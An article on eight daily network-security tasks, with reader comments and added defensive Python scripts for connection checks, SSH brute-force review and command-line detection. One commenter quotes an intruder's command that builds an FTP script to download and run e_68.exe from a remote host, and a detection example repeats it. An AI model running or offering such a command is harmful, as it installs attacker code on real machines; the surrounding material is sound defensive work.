Eight daily steps to a more secure network

While many companies have a 9-to-5 security staff, hackers don't punch a clock. However, your network can still remain secure in the 16 hours in-between -- you just need to focus activities to provide maximum coverage for the network. Get started with this list of eight daily tasks.

In today's connected world, hacking is a 24/7 business. Whether approaching it as a job or a hobby, hackers don't punch a clock.

While many companies don't have the budget for 24/7 security managers, that doesn't mean you should just give up on security. If your security staff, or your one security staff member, is on a 9-to-5 schedule, your network can still remain secure in the 16 hours in-between -- you just need to focus activities to provide maximum coverage for the network.

Develop a methodical, comprehensive task list that provides the most efficient means of securing your network. To jump-start your planning, here are eight simple tasks you should make sure to check off every day.

In the morning

After arriving at work, get some coffee, check your e-mail, and do the following:

  1. Verify the current connections: There's nothing like catching malicious behavior while it's occurring. Inspect all the connections going through your firewall -- both in and out. Look for anomalies and investigate them; this could include outbound FTP or inbound Telnet/SSH sessions. You're looking for things that aren't normal.
  2. Look at network traffic statistics: How much activity took place while you weren't there? What type of traffic was it, and what was the destination and source?
  3. Look at your antivirus logs: Did a virus hit your e-mail system last night? Are the antivirus signatures up to date?
  4. Read the security logs on your domain servers: Did the system lock out any accounts last night? Pay special attention to any accounts with administrator access. Verify that lockouts were human error -- and not part of a breach attempt.
  5. Check for new security patches: Determine whether any of your vendors released patches for any software in your baseline. (If you don't have a baseline, I highly recommend developing one.) If a new patch is available, read the release notes thoroughly. Then, make a decision or recommendation whether to implement it now or wait for scheduled system downtime.
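The two morning items with the most mechanical logic, the connection check (item 1) and the lockout review (item 4), can be scripted so that the anomalies are on screen before the coffee is finished. The block below is an added example, not code from the article or its author. It assumes the firewall can export its connection table as plain "direction src sport dst dport proto" lines and that the domain server's security log can be exported as "time event user" lines; both formats, the internal address ranges and the admin account list are constructed for the example, and only the two parse functions change for a real export.

```python
"""Morning check (added example): flag anomalous firewall connections and
account lockouts, with admin accounts listed first."""
import ipaddress
from collections import namedtuple

# Constructed for the example: your internal ranges and privileged accounts.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]
ADMIN_ACCOUNTS = {"administrator", "backupadmin"}

# Item 1: outbound FTP to the Internet and inbound Telnet/SSH from the
# Internet are the kinds of sessions the article says to investigate.
SUSPECT_OUTBOUND_PORTS = {21: "outbound FTP"}
SUSPECT_INBOUND_PORTS = {22: "inbound SSH", 23: "inbound Telnet"}

Conn = namedtuple("Conn", "direction src sport dst dport proto")

# Constructed sample export (assumed format: direction src sport dst dport proto).
SAMPLE_CONNECTIONS = """\
in  203.0.113.7   51234 192.168.1.10 22  tcp
out 192.168.1.20  40000 198.51.100.9 21  tcp
out 192.168.1.21  40001 198.51.100.9 443 tcp
in  192.168.1.5   50000 192.168.1.10 22  tcp
"""

# Constructed sample security-log export (assumed format: time event user).
SAMPLE_EVENTS = """\
02:14 LOCKOUT jsmith
03:40 LOCKOUT Administrator
03:41 LOGON_OK jsmith
"""


def parse_connections(text):
    """Turn the assumed export format into Conn records."""
    conns = []
    for line in text.strip().splitlines():
        direction, src, sport, dst, dport, proto = line.split()
        conns.append(Conn(direction, ipaddress.ip_address(src), int(sport),
                          ipaddress.ip_address(dst), int(dport), proto))
    return conns


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def connection_anomalies(conns):
    """Item 1: return (reason, src, dst) for sessions that are not normal.
    Internal-to-internal SSH is left alone; only Internet-facing ones count."""
    findings = []
    for c in conns:
        if (c.direction == "out" and c.dport in SUSPECT_OUTBOUND_PORTS
                and not is_internal(c.dst)):
            findings.append((SUSPECT_OUTBOUND_PORTS[c.dport], str(c.src), str(c.dst)))
        elif (c.direction == "in" and c.dport in SUSPECT_INBOUND_PORTS
                and not is_internal(c.src)):
            findings.append((SUSPECT_INBOUND_PORTS[c.dport], str(c.src), str(c.dst)))
    return findings


def lockout_report(text):
    """Item 4: list overnight lockouts; admin accounts sort to the top so
    they are the first thing checked against human error."""
    lockouts = []
    for line in text.strip().splitlines():
        ts, event, user = line.split()
        if event == "LOCKOUT":
            lockouts.append((user.lower() in ADMIN_ACCOUNTS, ts, user))
    lockouts.sort(reverse=True)
    return [(ts, user, "ADMIN" if adm else "user") for adm, ts, user in lockouts]


if __name__ == "__main__":
    for finding in connection_anomalies(parse_connections(SAMPLE_CONNECTIONS)):
        print("CONNECTION:", *finding)
    for entry in lockout_report(SAMPLE_EVENTS):
        print("LOCKOUT:", *entry)
```

Run it against the real exports in place of the sample strings; the point is that the "is this normal?" question from item 1 is encoded once as policy (which ports, which direction, which address ranges) rather than re-derived by eye every morning.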

In the afternoon

When you arrive back from lunch, there's still a lot left to do:

  1. Meet and brief: Managers like to know what's going on, so don't wait for them to ask -- tell them. Meet and brief on anything that occurred during the evening and the actions you've taken so far. This is also a good time to pitch new ideas, such as tools that could help you defend the network or staff training.
  2. Check more logs: Take an in-depth look at IDS and firewall logs. Who on the Internet is knocking on your door? What are they looking for? Who on the inside of your network is doing something they shouldn't be? If you find unauthorized and/or illegal activity, report it immediately, and take action to stop it.
  3. Turn knowledge into action: Now that you know what went on while you weren't there, develop an action plan to prevent the behavior in the future. Do you need to adjust your firewall rules? Is your IDS catching and reporting the proper events? Do you need to archive logs to save space on your servers? Do you need to give a final briefing on any actions that occurred during the last 24 hours?

Final thoughts

A lot of companies don't run 24/7 security operations, and sometimes you might find yourself as the only person providing security for a network. While it's easy to get caught up in events and miss important items on your security checklist, you'll never know what you're missing if you don't create a list in the first place. Network security shouldn't be reactionary -- don't wait for events to drive you into action.

The above list isn't complete, but it's a starting point. Create your own security to-do list that's specific to your organization's needs, and keep your security on track.

Mike Mullins has served as an assistant network administrator and a network security administrator for the U.S. Secret Service and the Defense Information Systems Agency. He is currently the director of operations for the Southern Theater Network Operations and Security Center.

17 comments
cd613

yet I add more but they are more for security

JCitizen

let alone the office! Thanks Mike!

jmixmaster

I do understand that anti-virus, Windows updates, etc. occur during idle times; however, I seem to be getting activity from the ISP TO my network on a regular basis. Should I be concerned? Mix

dlragsdale

OK... I have been running a website, FTP server, etc. from my home for about 1 year, with no problems. Just this week, my server was completely overtaken, and the sad thing is I caught them, just a little too late. They have completely corrupted my website, emptied all logs... and no telling what else. But what they don't know is that while they were trying to wrap things up, I got their IP address. The address looks like it came from my ISP. Is there anything that I can do to take legal action or find out who this person(s) is? PLEASE HELP... It is not a business site, but it is a family website with pictures, news, etc. I need to know what I can do. I also discovered how they got in and I have closed that port, but I don't know if they opened any other doors. I have completed virus scans, adware/spyware scans. I also have a command line that was still in the system that I'm not sure what it does... it looks like they were trying to remove their IP address from accessing the FTP site. THANKS IN ADVANCE FOR THE ADVICE

dlragsdale

I have completed the 2003 installation and services... All seems good except for logging into my website... NO ONE can log in. I even looked at the ASP.NET configurations and users; they are all still there. Don't know what to do about that one... It is running from a SQL 2005 Express DB, so if any gurus out there would like to help on that situation, I would be much appreciative... But thanks again for the advice to do a clean sweep and reinstall 2003. It seems to run smoother on that machine as well.

DanLM

Is it a Windows or Unix system? Do you have a router between you and the machine that was hacked? If you close off the ports at the router, then no matter what the machine thinks is open, it's not open to the world. I run a Unix server at home, and I found I was being pounded on by people looking for ways to get in. I did the following to tighten down my machine:

  1. Only opened my ports at the router for SSH, FTP, and the web page.
  2. Put in a Unix firewall. Did a lot of reading here, and found some good suggestions for generic blocks that stop spoofing and Linux boxes that are scanning my machine.
  3. Started reviewing my logs daily (SSH/FTP/web page), looking for brute force attacks. When I found IPs that I didn't trust in my logs, instant firewalling to all services. I automated some of this through Perl and shell scripts. Have these scripts running every 2 minutes to check the logs. I'm looking to get this to be real time.

If you tell me the OS, I might be able to offer some other suggestions, and point you at some tutorials/forum postings/articles to further secure your machine. Dan
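The daily log review Dan describes (count failed logins per source, then firewall the sources you don't trust) is the kind of thing that is worth scripting exactly because it runs every couple of minutes. The block below is an added example written for this thread, not Dan's scripts. The failure lines follow the shape OpenSSH writes to the auth log, but the sample entries themselves are constructed; the pf table name bruteforce and the trusted-address list are assumptions, and the pf.conf entry that gives the table effect is described in the comment rather than shipped here.

```python
"""Brute-force review (added example): count sshd failures per source IP
and emit the pfctl commands that would block repeat offenders."""
import re
from collections import Counter, defaultdict

# OpenSSH failure line: optional "invalid user" prefix, then user and source.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) "
    r"from (\d+\.\d+\.\d+\.\d+)")

# Constructed sample auth log: one source hammering the box, one LAN typo.
SAMPLE_AUTH_LOG = """\
Mar  3 02:10:01 host sshd[1201]: Failed password for invalid user admin from 203.0.113.50 port 40122 ssh2
Mar  3 02:10:03 host sshd[1202]: Failed password for invalid user oracle from 203.0.113.50 port 40123 ssh2
Mar  3 02:10:05 host sshd[1203]: Failed password for root from 203.0.113.50 port 40124 ssh2
Mar  3 02:10:09 host sshd[1204]: Failed password for invalid user test from 203.0.113.50 port 40125 ssh2
Mar  3 02:10:12 host sshd[1205]: Failed password for invalid user guest from 203.0.113.50 port 40126 ssh2
Mar  3 07:45:10 host sshd[1330]: Failed password for dan from 192.168.1.15 port 50001 ssh2
Mar  3 07:45:20 host sshd[1331]: Accepted password for dan from 192.168.1.15 port 50001 ssh2
"""

THRESHOLD = 5
# Assumed: addresses that must never be auto-blocked (your own LAN, a jump box).
TRUSTED = {"192.168.1.15"}


def failed_attempts(log_text):
    """Return (failures per IP, usernames tried per IP)."""
    counts = Counter()
    users = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            counts[ip] += 1
            users[ip].add(user)
    return counts, users


def offenders(log_text, threshold=THRESHOLD):
    """Sources at or above the threshold, minus the trusted list."""
    counts, _ = failed_attempts(log_text)
    return sorted(ip for ip, n in counts.items()
                  if n >= threshold and ip not in TRUSTED)


def pf_block_commands(ips, table="bruteforce"):
    """pfctl syntax for adding addresses to a table.  Assumes pf.conf already
    contains 'table <bruteforce> persist' and a 'block in quick from
    <bruteforce>' rule; without those the table has no effect."""
    return [f"pfctl -t {table} -T add {ip}" for ip in ips]


if __name__ == "__main__":
    counts, users = failed_attempts(SAMPLE_AUTH_LOG)
    for ip in offenders(SAMPLE_AUTH_LOG):
        print(f"{ip}: {counts[ip]} failures, users tried: {sorted(users[ip])}")
    for cmd in pf_block_commands(offenders(SAMPLE_AUTH_LOG)):
        print(cmd)
```

Printing the commands rather than running them keeps the script safe to test on a copy of the log; the trusted list is the check that matters most, since a script that blocks your own address at 2 a.m. is worse than no script. Entries in a pf table persist until removed, so pair this with a periodic expiry if you run it unattended.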

dlragsdale

It is a Windows 2000 server... with a Linksys router between it and the world. I had FTP, web, remote admin web, several gaming and a voice communications application port open. I have closed all of the gaming, voice, remote admin, and web ports... the only thing open now is FTP. Which I feel may have been compromised some way to allow an intruder in. This is the line I caught him typing in the run line: cmd.exe /c del i&echo open 207.68.xxx.xxx 32676 > i&echo user 1 1 >> i &echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit What does that do exactly? Is there anything that I can do legally since he has destroyed an electronic property :D?
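The command line quoted above uses echo to write a small FTP script file (named i), runs the Windows ftp client non-interactively against that script (ftp -n -s:i) to fetch e_68.exe from the remote host, executes the downloaded file, and deletes the script. The combination is worth a detection rule on any host that records process command lines, since a lone "ftp -s:" is ordinary automation but an echo-built script feeding it is not. The block below is an added example, not from the thread; the command-line entries are constructed, and the one that mirrors the quoted line uses a documentation address in place of the real host.

```python
"""Command-line review (added example): flag the echo-built FTP script
download pattern from process command-line records."""
import re

# Each indicator is one piece of the pattern; they are scored together so a
# single harmless "ftp -s:" does not page anyone.
INDICATORS = {
    "ftp_script_file": re.compile(r"\bftp(\.exe)?\b[^&|]*-s:", re.I),
    "ftp_non_interactive": re.compile(r"\bftp(\.exe)?\b[^&|]*-n\b", re.I),
    "echo_builds_ftp_script": re.compile(r"\becho\s+open\s+\S+.*>\s*\S+", re.I),
    "echo_get_redirect": re.compile(r"\becho\s+get\s+\S+\s*>>", re.I),
}

# Constructed sample command lines; the last reproduces the shape of the
# quoted line with 203.0.113.10 standing in for the real host.
SAMPLE_CMDLINES = [
    "ftp ftp.example.internal",
    "cmd.exe /c xcopy C:\\data D:\\backup /E /Y",
    "ftp -s:C:\\jobs\\nightly.ftp",
    ("cmd.exe /c del i&echo open 203.0.113.10 32676 > i&echo user 1 1 >> i "
     "&echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit"),
]


def score_cmdline(cmdline):
    """Names of the indicators present in one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def suspicious(cmdlines, min_hits=2):
    """Command lines with at least min_hits indicators, with the hits, so
    the analyst sees why each one was flagged."""
    flagged = []
    for c in cmdlines:
        hits = score_cmdline(c)
        if len(hits) >= min_hits:
            flagged.append((c, hits))
    return flagged


if __name__ == "__main__":
    for cmdline, hits in suspicious(SAMPLE_CMDLINES):
        print("FLAGGED:", hits)
        print("   ", cmdline)
```

The scheduled "ftp -s:" job in the sample scores one hit and is left alone; the quoted line scores all four. Feed the function from whatever records command lines on your hosts (process auditing, an EDR export) rather than the Run box, which keeps no history.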

safesax2002

I'll second that answer on 2003. Much more secure, plus IIS has been upgraded to version 6 from 5. Big difference in security.

ashine

Microsoft did a lot of security work between releasing Windows 2000 and 2003. You'll find that 2003 doesn't automatically install some services, e.g. IIS, so you'll have to add them yourself (usual thing: Add/Remove Programs, select Windows Components, select the component you want and drop the CD in the drive, etc.). Microsoft did this to reduce the attack surface of 2003: the fewer services running, the less there is to attack. And do remember to go to Windows Update and get the latest security patches (for preference, set up Automatic Updates to do this on a schedule!). Good luck

dlragsdale

I can put Windows Server 2003 on instead of 2000... Does anyone have any input as to which one is more secure?

Krunkl3

*dale... I am not a lawyer, and local laws vary in your available recourse. General security practices would say if the machine has been compromised it is no longer yours and will not be yours again w/o a format & re-install. No amount of rooting out of intruders is 100% effective, so if you value the services this machine provides, take it offline, archive/disk-image if desired (to find and close the holes), and re-install. I'll second sans.org as an excellent resource for hardening systems. The learning curve on hardening Windows 2k+ machines is steep but it can be done. Good luck. - Logan

trl145

Mike Mullins' comments are good and I take them to heart. However, still being a novice, and realizing his page was not intended for novices (though perhaps others like me might agree), the question is HOW can I do what he advises? Literally, step by step, how can I: 1) check my traffic, 2) see if my anti-virus software has been attacked, and so on and so on. Thanks, t

Mysterious

Had a prof at the Big U, who described the worst test he ever had: A. Define the Universe B. Give three examples Your question, while valid, is roughly equivalent to that test. You see, Mike's advice is necessarily generic, because there are so many different systems out there, from PCs to Macs to Solaris to Linux to VAXen to mainframes to...well, you get the idea. Not knowing what you're working on, it's tough to make suggestions. However, the easiest answer is to read your log files. In Windows, it's the Event Viewer. In most Linux/Unix boxes, it's usually something like /var/adm/messages. Learn to use the Windows filters, or to grep in L/Unix (or use something like LogWatch -- Google will help with that one). The next step is to go to sans.org, or any of a dozen other sites, and study up on what you should be looking for, because it's different for every different kind of box (and sometimes your firewall logs won't tell you what your web server logs will, so don't expect to catch everything in one place). Have fun with it, learn as much as you can, and let us know how it goes.

BIOSphereopts

Just checked my logs in my AV firewall, and for the Windows firewall, then checked Event Viewer to find two unsuccessful attempts to log in to my account! I then went to my Windows firewall and found that FTP, Telnet, Remote Desktop and HTTP server were all enabled! I've been tracing IPs to Australia and Sweden. What can I do? I shut down the ports they opened; it seems that the Trend Micro PC-cillin firewall is blocking a lot of UDP attempts from ports in the 30k range, and 1026 and 1027. Scary stuff!

sean

Sure, you might find something, but even using filters you are bound to miss something. No sysadmin has enough time to stay on top of such a herculean task, not to mention the storage requirements on a Windows server (no syslog built in) can be onerous. Your best bet is to get an IDS that will proactively scan for suspicious behavior and use a tool that will scan the logs for you and alert you based on predefined rule sets.

DanLM

I really have no idea what to check on my Windows system. But, I read both the /var/log/auth and /var/log/pf.log on my Unix system. The auth log tells me valid/invalid inputs via SSH. Oh, and my FTP logs. I found loads of information in them too. Brute force attempts. The pf log shows me, because of my settings, a pattern of who is being blocked based on my rule set. I'm going to install Snort, which is an IDS(???). That analyzes all traffic to identify possible holes and attempts against my system that I have not previously blocked or accounted for. Dan
